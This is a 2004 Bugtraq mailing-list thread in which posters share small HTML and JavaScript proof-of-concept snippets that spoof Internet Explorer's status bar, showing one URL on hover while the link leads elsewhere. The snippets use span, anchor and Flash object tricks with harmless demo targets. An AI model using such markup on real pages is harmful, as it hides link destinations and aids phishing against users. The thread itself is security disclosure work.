RE: New URL spoofing bug in Microsoft Internet Explorer
Or even a fake "a" tag:
<span style="color: blue; text-decoration: underline; cursor: hand;"
onmouseover="window.status = 'http://www.msn.com/';"
onmouseout="window.status = 'Done.'" onclick="document.location =
'http://www.google.com'"> Visit Msn! </span>
-----Original Message-----
From: q q [mailto:systemcracker@xxxxxxxxx]
Sent: Wednesday, 17 November 2004 3:11 AM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: New URL spoofing bug in Microsoft Internet Explorer
I thought this was obvious, but having seen the amount of discussion,
here's another URL spoofer:
<a href="http://www.google.com"
onmousemove="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>
note that
<a href="http://www.google.com"
onmouseover="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>
won't work - it seems MS have already half fixed this....
(tested on MSIE 6.0, winXP)
On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi
<roozbeh_afrasiabi@xxxxxxxxx> wrote:
> In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer>
>
> Here is another way of spoofing the status bar:
>
> <a> tag + <object> tag
>
> <!--A HREF=http://www.yahoo.com><!--OBJECT
classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
>
>
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflas
h.cab#version=6,0,0,0"
>
> WIDTH="300" HEIGHT="50" id="link" ALIGN="">
>
> <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high >
> <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu
>
> VALU=FALSE>
>
> <EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300"
HEIGHT="50" NAME="link" ALIGN=""
>
> TYPE="application/x-shockwave-flash"
> PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
>
> </a></OBJECT></a>
>
> *this method of spoofing the status bar allows malicious users to hide
> the target url from suspecting ppl ,demo page uses flash to generate
>
> random urls.
>
> demo:
>
> http://www.persiax.com/pocs/statusbar/status.htm
>
>
--
PHP, mySQL Security and more at http://www.puremango.co.uk
**********************************************************************
This email message and accompanying data may contain information that is
confidential and/or subject to legal privilege. If you are not the intended
recipient, you are notified that any use, dissemination, distribution or
copying of this message or data is prohibited. If you have received this email
message in error, please notify us immediately and erase all copies of this
message and attachments.
This email is for your convenience only, you should not rely on any information
contained herein for contractual or legal purposes. You should only rely on
information and/or instructions in writing and on company letterhead signed by
authorised persons.
**********************************************************************